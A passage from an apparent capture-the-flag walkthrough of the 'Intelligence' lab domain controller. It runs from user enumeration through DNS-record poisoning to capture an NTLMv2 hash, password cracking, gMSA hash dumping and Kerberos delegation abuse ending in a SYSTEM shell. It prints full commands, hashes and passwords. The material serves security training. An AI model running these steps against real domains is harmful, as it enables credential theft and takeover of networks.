index: 0xf89 RID: 0x46e acb: 0x00000210 Account: Jessica.Moody	Name: (null)	Desc: (null)
index: 0xf84 RID: 0x469 acb: 0x00000210 Account: Joel.Crawford	Name: (null)	Desc: (null)
index: 0xf79 RID: 0x45e acb: 0x00000210 Account: John.Coleman	Name: (null)	Desc: (null)
index: 0xf6b RID: 0x450 acb: 0x00000210 Account: Jose.Williams	Name: (null)	Desc: (null)
index: 0xf74 RID: 0x459 acb: 0x00000210 Account: Kaitlyn.Zimmerman	Name: (null)	Desc: (null)
index: 0xf76 RID: 0x45b acb: 0x00000210 Account: Kelly.Long	Name: (null)	Desc: (null)
index: 0xf10 RID: 0x1f6 acb: 0x00000211 Account: krbtgt	Name: (null)	Desc: Key Distribution Center Service Account
index: 0xf8e RID: 0x473 acb: 0x00000210 Account: Laura.Lee	Name: (null)	Desc: (null)
index: 0xf72 RID: 0x457 acb: 0x00000210 Account: Michelle.Kent	Name: (null)	Desc: (null)
index: 0xf77 RID: 0x45c acb: 0x00000210 Account: Nicole.Brock	Name: (null)	Desc: (null)
index: 0xf7d RID: 0x462 acb: 0x00000210 Account: Richard.Williams	Name: (null)	Desc: (null)
index: 0xf6d RID: 0x452 acb: 0x00000210 Account: Samuel.Richardson	Name: (null)	Desc: (null)
index: 0xf6f RID: 0x454 acb: 0x00000210 Account: Scott.Scott	Name: (null)	Desc: (null)
index: 0xf78 RID: 0x45d acb: 0x00000210 Account: Stephanie.Young	Name: (null)	Desc: (null)
index: 0xf8f RID: 0x474 acb: 0x00000210 Account: Ted.Graves	Name: (null)	Desc: (null)
index: 0xf7e RID: 0x463 acb: 0x00000210 Account: Teresa.Williamson	Name: (null)	Desc: (null)
index: 0xf7b RID: 0x460 acb: 0x00000210 Account: Thomas.Hall	Name: (null)	Desc: (null)
index: 0xf7a RID: 0x45f acb: 0x00000210 Account: Thomas.Valenzuela	Name: (null)	Desc: (null)
index: 0xf82 RID: 0x467 acb: 0x00000210 Account: Thomas.Wise	Name: (null)	Desc: (null)
index: 0xf8a RID: 0x46f acb: 0x00000210 Account: Tiffany.Molina	Name: (null)	Desc: (null)
index: 0xf75 RID: 0x45a acb: 0x00000210 Account: Travis.Evans	Name: (null)	Desc: (null)
index: 0xf83 RID: 0x468 acb: 0x00000210 Account: Veronica.Patel	Name: (null)	Desc: (null)
index: 0xf81 RID: 0x466 acb: 0x00000210 Account: William.Lee	Name: (null)	Desc: (null)

user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[Danny.Matthews] rid:[0x44f]
user:[Jose.Williams] rid:[0x450]
user:[Jason.Wright] rid:[0x451]
user:[Samuel.Richardson] rid:[0x452]
user:[David.Mcbride] rid:[0x453]
user:[Scott.Scott] rid:[0x454]
user:[David.Reed] rid:[0x455]
user:[Ian.Duncan] rid:[0x456]
user:[Michelle.Kent] rid:[0x457]
user:[Jennifer.Thomas] rid:[0x458]
user:[Kaitlyn.Zimmerman] rid:[0x459]
user:[Travis.Evans] rid:[0x45a]
user:[Kelly.Long] rid:[0x45b]
user:[Nicole.Brock] rid:[0x45c]
user:[Stephanie.Young] rid:[0x45d]
user:[John.Coleman] rid:[0x45e]
user:[Thomas.Valenzuela] rid:[0x45f]
user:[Thomas.Hall] rid:[0x460]
user:[Brian.Baker] rid:[0x461]
user:[Richard.Williams] rid:[0x462]
user:[Teresa.Williamson] rid:[0x463]
user:[David.Wilson] rid:[0x464]
user:[Darryl.Harris] rid:[0x465]
user:[William.Lee] rid:[0x466]
user:[Thomas.Wise] rid:[0x467]
user:[Veronica.Patel] rid:[0x468]
user:[Joel.Crawford] rid:[0x469]
user:[Jean.Walter] rid:[0x46a]
user:[Anita.Roberts] rid:[0x46b]
user:[Brian.Morris] rid:[0x46c]
user:[Daniel.Shelton] rid:[0x46d]
user:[Jessica.Moody] rid:[0x46e]
user:[Tiffany.Molina] rid:[0x46f]
user:[James.Curbow] rid:[0x470]
user:[Jeremy.Mora] rid:[0x471]
user:[Jason.Patterson] rid:[0x472]
user:[Laura.Lee] rid:[0x473]
user:[Ted.Graves] rid:[0x474]

 ===============================( Share Enumeration on intelligence.htb )===============================


	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	IT              Disk      
	NETLOGON        Disk      Logon server share 
	SYSVOL          Disk      Logon server share 
	Users           Disk      
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on intelligence.htb

//intelligence.htb/ADMIN$	Mapping: DENIED Listing: N/A Writing: N/A
//intelligence.htb/C$	Mapping: DENIED Listing: N/A Writing: N/A

[E] Can't understand response:

NT_STATUS_INVALID_INFO_CLASS listing \*
//intelligence.htb/IPC$	Mapping: N/A Listing: N/A Writing: N/A
//intelligence.htb/IT	Mapping: OK Listing: OK Writing: N/A
//intelligence.htb/NETLOGON	Mapping: OK Listing: OK Writing: N/A
//intelligence.htb/SYSVOL	Mapping: OK Listing: OK Writing: N/A
//intelligence.htb/Users	Mapping: OK Listing: OK Writing: N/A

 =====================================( Groups on intelligence.htb )=====================================


[+] Getting builtin groups:

group:[Server Operators] rid:[0x225]
group:[Account Operators] rid:[0x224]
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Incoming Forest Trust Builders] rid:[0x22d]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Administrators] rid:[0x220]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Print Operators] rid:[0x226]
group:[Backup Operators] rid:[0x227]
group:[Replicator] rid:[0x228]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]
group:[RDS Remote Access Servers] rid:[0x23f]
group:[RDS Endpoint Servers] rid:[0x240]
group:[RDS Management Servers] rid:[0x241]
group:[Hyper-V Administrators] rid:[0x242]
group:[Access Control Assistance Operators] rid:[0x243]
group:[Remote Management Users] rid:[0x244]
group:[Storage Replica Administrators] rid:[0x246]

[+]  Getting builtin group memberships:

Group: Certificate Service DCOM Access' (RID: 574) has member: NT AUTHORITY\Authenticated Users
Group: Users' (RID: 545) has member: NT AUTHORITY\INTERACTIVE
Group: Users' (RID: 545) has member: NT AUTHORITY\Authenticated Users
Group: Users' (RID: 545) has member: intelligence\Domain Users
Group: Administrators' (RID: 544) has member: intelligence\Administrator
Group: Administrators' (RID: 544) has member: intelligence\Enterprise Admins
Group: Administrators' (RID: 544) has member: intelligence\Domain Admins
Group: Windows Authorization Access Group' (RID: 560) has member: NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS
Group: Pre-Windows 2000 Compatible Access' (RID: 554) has member: NT AUTHORITY\Authenticated Users
Group: Pre-Windows 2000 Compatible Access' (RID: 554) has member: intelligence\DC$
Group: Guests' (RID: 546) has member: intelligence\Guest
Group: Guests' (RID: 546) has member: intelligence\Domain Guests

[+]  Getting local groups:

group:[Cert Publishers] rid:[0x205]
group:[RAS and IAS Servers] rid:[0x229]
group:[Allowed RODC Password Replication Group] rid:[0x23b]
group:[Denied RODC Password Replication Group] rid:[0x23c]
group:[DnsAdmins] rid:[0x44d]

[+]  Getting local group memberships:

Group: Cert Publishers' (RID: 517) has member: intelligence\DC$
Group: Denied RODC Password Replication Group' (RID: 572) has member: intelligence\krbtgt
Group: Denied RODC Password Replication Group' (RID: 572) has member: intelligence\Domain Controllers
Group: Denied RODC Password Replication Group' (RID: 572) has member: intelligence\Schema Admins
Group: Denied RODC Password Replication Group' (RID: 572) has member: intelligence\Enterprise Admins
Group: Denied RODC Password Replication Group' (RID: 572) has member: intelligence\Cert Publishers
Group: Denied RODC Password Replication Group' (RID: 572) has member: intelligence\Domain Admins
Group: Denied RODC Password Replication Group' (RID: 572) has member: intelligence\Group Policy Creator Owners
Group: Denied RODC Password Replication Group' (RID: 572) has member: intelligence\Read-only Domain Controllers

[+]  Getting domain groups:

group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[dba] rid:[0x475]
group:[itsupport] rid:[0x476]
group:[sysadmin] rid:[0x477]

[+]  Getting domain group memberships:

Group: 'Domain Controllers' (RID: 516) has member: intelligence\DC$
Group: 'Domain Computers' (RID: 515) has member: intelligence\svc_int$
Group: 'Schema Admins' (RID: 518) has member: intelligence\Administrator
Group: 'sysadmin' (RID: 1143) has member: intelligence\Jason.Patterson
Group: 'Domain Users' (RID: 513) has member: intelligence\Administrator
Group: 'Domain Users' (RID: 513) has member: intelligence\krbtgt
Group: 'Domain Users' (RID: 513) has member: intelligence\Danny.Matthews
Group: 'Domain Users' (RID: 513) has member: intelligence\Jose.Williams
Group: 'Domain Users' (RID: 513) has member: intelligence\Jason.Wright
Group: 'Domain Users' (RID: 513) has member: intelligence\Samuel.Richardson
Group: 'Domain Users' (RID: 513) has member: intelligence\David.Mcbride
Group: 'Domain Users' (RID: 513) has member: intelligence\Scott.Scott
Group: 'Domain Users' (RID: 513) has member: intelligence\David.Reed
Group: 'Domain Users' (RID: 513) has member: intelligence\Ian.Duncan
Group: 'Domain Users' (RID: 513) has member: intelligence\Michelle.Kent
Group: 'Domain Users' (RID: 513) has member: intelligence\Jennifer.Thomas
Group: 'Domain Users' (RID: 513) has member: intelligence\Kaitlyn.Zimmerman
Group: 'Domain Users' (RID: 513) has member: intelligence\Travis.Evans
Group: 'Domain Users' (RID: 513) has member: intelligence\Kelly.Long
Group: 'Domain Users' (RID: 513) has member: intelligence\Nicole.Brock
Group: 'Domain Users' (RID: 513) has member: intelligence\Stephanie.Young
Group: 'Domain Users' (RID: 513) has member: intelligence\John.Coleman
Group: 'Domain Users' (RID: 513) has member: intelligence\Thomas.Valenzuela
Group: 'Domain Users' (RID: 513) has member: intelligence\Thomas.Hall
Group: 'Domain Users' (RID: 513) has member: intelligence\Brian.Baker
Group: 'Domain Users' (RID: 513) has member: intelligence\Richard.Williams
Group: 'Domain Users' (RID: 513) has member: intelligence\Teresa.Williamson
Group: 'Domain Users' (RID: 513) has member: intelligence\David.Wilson
Group: 'Domain Users' (RID: 513) has member: intelligence\Darryl.Harris
Group: 'Domain Users' (RID: 513) has member: intelligence\William.Lee
Group: 'Domain Users' (RID: 513) has member: intelligence\Thomas.Wise
Group: 'Domain Users' (RID: 513) has member: intelligence\Veronica.Patel
Group: 'Domain Users' (RID: 513) has member: intelligence\Joel.Crawford
Group: 'Domain Users' (RID: 513) has member: intelligence\Jean.Walter
Group: 'Domain Users' (RID: 513) has member: intelligence\Anita.Roberts
Group: 'Domain Users' (RID: 513) has member: intelligence\Brian.Morris
Group: 'Domain Users' (RID: 513) has member: intelligence\Daniel.Shelton
Group: 'Domain Users' (RID: 513) has member: intelligence\Jessica.Moody
Group: 'Domain Users' (RID: 513) has member: intelligence\Tiffany.Molina
Group: 'Domain Users' (RID: 513) has member: intelligence\James.Curbow
Group: 'Domain Users' (RID: 513) has member: intelligence\Jeremy.Mora
Group: 'Domain Users' (RID: 513) has member: intelligence\Jason.Patterson
Group: 'Domain Users' (RID: 513) has member: intelligence\Laura.Lee
Group: 'Domain Users' (RID: 513) has member: intelligence\Ted.Graves
Group: 'Domain Admins' (RID: 512) has member: intelligence\Administrator
Group: 'Group Policy Creator Owners' (RID: 520) has member: intelligence\Administrator
Group: 'Enterprise Admins' (RID: 519) has member: intelligence\Administrator
Group: 'itsupport' (RID: 1142) has member: intelligence\Laura.Lee
Group: 'itsupport' (RID: 1142) has member: intelligence\Ted.Graves
Group: 'dba' (RID: 1141) has member: intelligence\Jeremy.Mora
Group: 'Domain Guests' (RID: 514) has member: intelligence\Guest
enum4linux complete on Sun Aug 29 21:13:01 2021

With this data, we gained some insight into how we can gain good information once we access the victim machine. For example, along with users we also have now a domain computer and what is possibly associated with the machine logon (intelligence\svc_int$).

Gaining Access

As we saw in the last step of our enumeration, three groups look interesting: dba, itsupport, and sysadmins. And we have the following:

[+] Getting domain group memberships:
Group 'dba' (RID: 1141) has member: intelligence\Jeremy.Mora
Group 'itsupport' (RID: 1142) has member: intelligence\Laura.Lee
Group 'itsupport' (RID: 1142) has member: intelligence\Ted.Graves
Group 'sysadmin' (RID: 1143) has member: intelligence\Jason.Patterson

As we can see, we can access the IT, Users, NETLOGON, and Sysvol shares, but nothing else. Let's try Users share and see what can we access.

┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ smbclient  //intelligence.htb/Users -W "intelligence.htb" -U "Tiffany.Molina%NewIntelligenceCorpUser9876"
Try "help" to get a list of possible commands.
smb: \> pwd
Current directory is \\intelligence.htb\Users\
smb: \> ls
  .                                  DR        0  Sun Apr 18 21:20:26 2021
  ..                                 DR        0  Sun Apr 18 21:20:26 2021
  Administrator                       D        0  Sun Apr 18 20:18:39 2021
  All Users                       DHSrn        0  Sat Sep 15 03:21:46 2018
  Default                           DHR        0  Sun Apr 18 22:17:40 2021
  Default User                    DHSrn        0  Sat Sep 15 03:21:46 2018
  desktop.ini                       AHS      174  Sat Sep 15 03:11:27 2018
  Public                             DR        0  Sun Apr 18 20:18:39 2021
  Ted.Graves                          D        0  Sun Apr 18 21:20:26 2021
  Tiffany.Molina                      D        0  Sun Apr 18 20:51:46 2021
   
        3770367 blocks of size 4096. 1442036 blocks available
smb: \> cd Tiffany.Molina
smb: \Tiffany.Molina\> ls
  .                                   D        0  Sun Apr 18 20:51:46 2021
  ..                                  D        0  Sun Apr 18 20:51:46 2021
  AppData                            DH        0  Sun Apr 18 20:51:46 2021
  Application Data                DHSrn        0  Sun Apr 18 20:51:46 2021
  Cookies                         DHSrn        0  Sun Apr 18 20:51:46 2021
  Desktop                            DR        0  Sun Apr 18 20:51:46 2021
  Documents                          DR        0  Sun Apr 18 20:51:46 2021
  Downloads                          DR        0  Sat Sep 15 03:12:33 2018
  Favorites                          DR        0  Sat Sep 15 03:12:33 2018
  Links                              DR        0  Sat Sep 15 03:12:33 2018
  Local Settings                  DHSrn        0  Sun Apr 18 20:51:46 2021
  Music                              DR        0  Sat Sep 15 03:12:33 2018
  My Documents                    DHSrn        0  Sun Apr 18 20:51:46 2021
  NetHood                         DHSrn        0  Sun Apr 18 20:51:46 2021
  NTUSER.DAT                        AHn   131072  Tue Jun 29 16:00:17 2021
  ntuser.dat.LOG1                   AHS    86016  Sun Apr 18 20:51:46 2021
  ntuser.dat.LOG2                   AHS        0  Sun Apr 18 20:51:46 2021
  NTUSER.DAT{6392777f-a0b5-11eb-ae6e-000c2908ad93}.TM.blf    AHS    65536  Sun Apr 18 20:51:46 2021
  NTUSER.DAT{6392777f-a0b5-11eb-ae6e-000c2908ad93}.TMContainer00000000000000000001.regtrans-ms    AHS   524288  Sun Apr 18 20:51:46 2021
  NTUSER.DAT{6392777f-a0b5-11eb-ae6e-000c2908ad93}.TMContainer00000000000000000002.regtrans-ms    AHS   524288  Sun Apr 18 20:51:46 2021
  ntuser.ini                        AHS       20  Sun Apr 18 20:51:46 2021
  Pictures                           DR        0  Sat Sep 15 03:12:33 2018
  Recent                          DHSrn        0  Sun Apr 18 20:51:46 2021
  Saved Games                         D        0  Sat Sep 15 03:12:33 2018
  SendTo                          DHSrn        0  Sun Apr 18 20:51:46 2021
  Start Menu                      DHSrn        0  Sun Apr 18 20:51:46 2021
  Templates                       DHSrn        0  Sun Apr 18 20:51:46 2021
  Videos                             DR        0  Sat Sep 15 03:12:33 2018
 
        3770367 blocks of size 4096. 1442036 blocks available
smb: \Tiffany.Molina\> ls Desktop\
  .                                  DR        0  Sun Apr 18 20:51:46 2021
  ..                                 DR        0  Sun Apr 18 20:51:46 2021
  user.txt                           AR       34  Sun Aug 29 06:35:26 2021
   
        3770367 blocks of size 4096. 1442036 blocks available
smb: \Tiffany.Molina\> get Desktop\user.txt 
getting file \Tiffany.Molina\Desktop\user.txt of size 34 as Desktop\user.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)

And so looks like we got the user flag!

┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ cat 'Desktop\user.txt' 
492157********************a5477f

Along with this, we can tell who else to look at next...Ted.Graves, a member of itsupport.

Right from the IT share, we are able to get a powershell script:

┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ smbclient  //intelligence.htb/IT -W "intelligence.htb" -U "Tiffany.Molina%NewIntelligenceCorpUser9876"
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Apr 18 20:50:55 2021
  ..                                  D        0  Sun Apr 18 20:50:55 2021
  downdetector.ps1                    A     1046  Sun Apr 18 20:50:55 2021
   
        3770367 blocks of size 4096. 1441236 blocks available
smb: \>  get downdetector.ps1 
getting file \downdetector.ps1 of size 1046 as downdetector.ps1 (5.7 KiloBytes/sec) (average 5.7 KiloBytes/sec)
smb: \> quit
 
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ cat downdetector.ps1 
��# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory 
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*")  {
try {
$request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
if(.StatusCode -ne 200) {
Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
}
} catch {}
}

This powershell script was developed to check the availability of any sites using a domain name that start with 'web'.

At this point, I think we can use Responder while the script runs locally on the victim machine, which seems to be used periodically to validate if the site is down. For this, we will use krbrelayx's dnstool to try and create a DNS record under intelligence.htb domain.

Manipulating DNS and NTLM Hash Capture

Given that the downdetector.py script is looking for any site starting with web, we can add a DNS record like that, so we will add 'webfoo.intelligence.htb' and then validate the DNS record was created.

┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ python3 /opt/krbrelayx/dnstool.py -u 'intelligence.htb\Tiffany.Molina' \                                                                                           
-p 'NewIntelligenceCorpUser9876' -a add -r 'webfoo.intelligence.htb' \
-d 10.10.14.31 10.129.95.154
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
/opt/krbrelayx/dnstool.py:241: DeprecationWarning: please use dns.resolver.Resolver.resolve() instead
  res = dnsresolver.query(zone, 'SOA')
[-] Adding new record
[+] LDAP operation completed successfully

┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ dig @intelligence.htb -t any webfoo.intelligence.htb
 
; <<>> DiG 9.16.15-Debian <<>>@intelligence.htb webfoo.intelligence.htb
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 3892
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;webfoo.intelligence.htb.	IN	A

;; AUTHORITY SECTION:
intelligence.htb.	3600	IN	SOA	dc.intelligence.htb. hostmaster.intelligence.htb. 188 900 600 86400 3600

;; Query time: 40 msec
;; SERVER: 10.129.95.154#53(10.129.95.154)
;; WHEN: Sun Aug 29 23:38:29 EDT 2021
;; MSG SIZE  rcvd: 118

On another terminal window, we run Responder and wait 5 minutes for the script to run to capture NTLM hashes when the powershell script is executed and webfoo.intelligence.htb is found:

┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ sudo responder -I tun1 -i 10.10.14.31 -A
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|
 
           NBT-NS, LLMNR & MDNS Responder 3.0.6.0
 
  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C
 
 
[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    DNS/MDNS                   [ON]
 
[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]
 
[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]
 
[+] Poisoning Options:
    Analyze Mode               [ON]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Fingerprint hosts          [OFF]
 
[+] Generic Options:
    Responder NIC              [tun1]
    Responder IP               [10.10.14.31]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP']
 
[+] Current Session Variables:
    Responder Machine Name     [WIN-MJOIRCXWJLL]
    Responder Domain Name      [L8V7.LOCAL]
    Responder DCE-RPC Port     [47274]
[i] Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned.
[Analyze mode: ICMP] You can ICMP Redirect on this network.
[Analyze mode: ICMP] This workstation (10.10.14.31) is not on the same subnet than the DNS server (10.35.0.1).
[Analyze mode: ICMP] Use `python tools/Icmp-Redirect.py` for more details.
[Analyze mode: ICMP] You can ICMP Redirect on this network.
[Analyze mode: ICMP] This workstation (10.10.14.31) is not on the same subnet than the DNS server (192.168.2.1).
[Analyze mode: ICMP] Use `python tools/Icmp-Redirect.py` for more details.
 
[+] Listening for events...
 
[HTTP] NTLMv2 Client   : 10.129.95.154
[HTTP] NTLMv2 Username : intelligence\Ted.Graves
[HTTP] NTLMv2 Hash     : Ted.Graves::intelligence:64c89b9435433bdf:5D84FBE3CAB9ABBDFE2EB192A9F29E13:0101000000000000E370A91E8B9DD701285ACD78B7C17CCF00000000020008004C0038005600370001001E00570049004E002D004D004A004F00490052004300580057004A004C004C00040014004C003800560037002E004C004F00430041004C0003003400570049004E002D004D004A004F00490052004300580057004A004C004C002E004C003800560037002E004C004F00430041004C00050014004C003800560037002E004C004F00430041004C0008003000300000000000000000000000002000004EFD9984637182FF871938C959F49E0B019165C48A5DD2B56826A726A26BE57B0A001000000000000000000000000000000000000900380048005400540050002F0077006500620066006F006F002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000

Here we have an NTLM Hash from Ted.Graves:

[HTTP] NTLMv2 Hash : Ted.Graves::intelligence:64c89b9435433bdf:5D84FBE3CAB9ABBDFE2EB192A9F29E13:0101000000000000E370A91E8B9DD701285ACD78B7C17CCF00000000020008004C0038005600370001001E00570049004E002D004D004A004F00490052004300580057004A004C004C00040014004C003800560037002E004C004F00430041004C0003003400570049004E002D004D004A004F00490052004300580057004A004C004C002E004C003800560037002E004C004F00430041004C00050014004C003800560037002E004C004F00430041004C0008003000300000000000000000000000002000004EFD9984637182FF871938C959F49E0B019165C48A5DD2B56826A726A26BE57B0A001000000000000000000000000000000000000900380048005400540050002F0077006500620066006F006F002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000

Privilege Escalation

Before proceeding, let's crack this NTLMv2 hash so we can use the password when needed.

┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ john --wordlist=/opt/seclists/Passwords/Leaked-Databases/rockyou.txt ted_graves.hash 
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Mr.Teddy         (Ted.Graves)
1g 0:00:00:08 DONE (2021-08-29 23:46) 0.1118g/s 1209Kp/s 1209Kc/s 1209KC/s Mrz.browntillthedayidie..Morganstern
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed

Now the we have Ted.Graves password, let's try and see if we have access to the shares and what access.

┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ smbmap -H intelligence.htb -d intelligence.htb -u 'Ted.Graves' -p 'Mr.Teddy'
[+] IP: intelligence.htb:445    Name: unknown                                           
        Disk                                                    Permissions Comment
    ----                                                    ----------- -------
    ADMIN$                                              NO ACCESS   Remote Admin
    C$                                                  NO ACCESS   Default share
    IPC$                                                READ ONLY   Remote IPC
    IT                                                  READ ONLY   
    NETLOGON                                            READ ONLY   Logon server share 
    SYSVOL                                              READ ONLY   Logon server share 
    Users                                               READ ONLY

Inspecting Permissions with BloodHound

Using 'Ted.Graves' does not give us much of a direct access to the platform, so given the LDAP information we obtained through enum4linux, we know there is more to it so let's try and gather more information through LDAP by using Bloodhound and its remote ingestor.

┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ bloodhound-python -d intelligence.htb -u Ted.Graves@intelligence.htb -p 'Mr.Teddy' -gc intelligence.htb -c all -ns 10.129.95.154      
INFO: Found AD domain: intelligence.htb
INFO: Connecting to LDAP server: dc.intelligence.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: dc.intelligence.htb
INFO: Found 43 users
INFO: Found 55 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: svc_int.intelligence.htb
INFO: Querying computer: dc.intelligence.htb
WARNING: Could not resolve: svc_int.intelligence.htb: The DNS query name does not exist: svc_int.intelligence.htb.
INFO: Done in 00M 08S

In Bloodhound, when using the 'Shortest Paths to Unconstrained Delegation Systems' query, we see the ITSUPPORT group can read GMSA (group managed service account) passwords. From our LDAP enumeration and BloodHound, we know 'Ted.Graves' and 'Laura.Lee' are members of this group.

Dump GSMA Service Ticket

From all the different things we can attempt at this point, we can try to dump svc_int$ passwords readable by the user by using gMSADumper and then request the Kerberos Service Ticket.

┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ python3 /opt/gMSADumper/gMSADumper.py -l dc.intelligence.htb -d intelligence.htb -u 'Ted.Graves' -p 'Mr.Teddy'
Users or groups who can read password for svc_int$:
 > DC$
 > itsupport
svc_int$:::5e47bac787e5e1970cf9acdb5b316239

┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ impacket-getST -spn dc.intelligence.htb "intelligence.htb/Ted.Graves:Mr.Teddy@intelligence.htb"
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
 
[*] Getting TGT for user
Kerberos SessionError: KDC_ERR_PREAUTH_FAILED(Pre-authentication information was invalid)

The information we passed to the domain controller was not sufficient as the time has to be as close as possible to the Kerberos server and we needed to specify properly the Service Principal Name.

Notice, we are attempting to impersonate the Administrator user given the 'AllowedtoDelegate' permisions svc_int$ has, as shown in the BloodHound screenshot.

┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ sudo ntpdate intelligence.htb
30 Aug 07:46:31 ntpdate[3415]: step time server 10.129.95.154 offset +25069.588326 sec

┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ impacket-getST -spn WWW/dc.intelligence.htb "intelligence.htb/svc_int$" -hashes ":5e47bac787e5e1970cf9acdb5b316239" -dc-ip dc.intelligence.htb -impersonate administrator
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
 
[*] Getting TGT for user
[*] Impersonating administrator
[*]     Requesting S4U2self
[*]     Requesting S4U2Proxy
[*] Saving ticket in administrator.ccache

Now that we got the service ticket, we need to have it accessible so we can gain access as administrator. In this case, we will set it as the KRB5CCNAME environment variable in our system to then use it to access the victim machine as Administrator.

┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ export KRB5CCNAME=administrator.ccache
 
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ impacket-psexec -dc-ip dc.intelligence.htb -k "intelligence.htb/Administrator@dc.intelligence.htb" -no-pass
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
 
[*] Requesting shares on dc.intelligence.htb.....
[*] Found writable share ADMIN$
[*] Uploading file WfoFBYFg.exe
[*] Opening SVCManager on dc.intelligence.htb.....
[*] Creating service sGUG on dc.intelligence.htb.....
[*] Starting service sGUG.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1879]
(c) 2018 Microsoft Corporation. All rights reserved.
 
C:\Windows\system32>whoami
nt authority\system
 
C:\Windows\system32>cd c:\Users\Administrator\Desktop
 
c:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is E3EF-EBBD
 
 Directory of c:\Users\Administrator\Desktop
 
04/18/2021  05:51 PM    <DIR>          .
04/18/2021  05:51 PM    <DIR>          ..
08/30/2021  03:28 AM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   5,924,732,928 bytes free
 
c:\Users\Administrator\Desktop>type root.txt    
38418e********************42bebd

And we got the root flag!

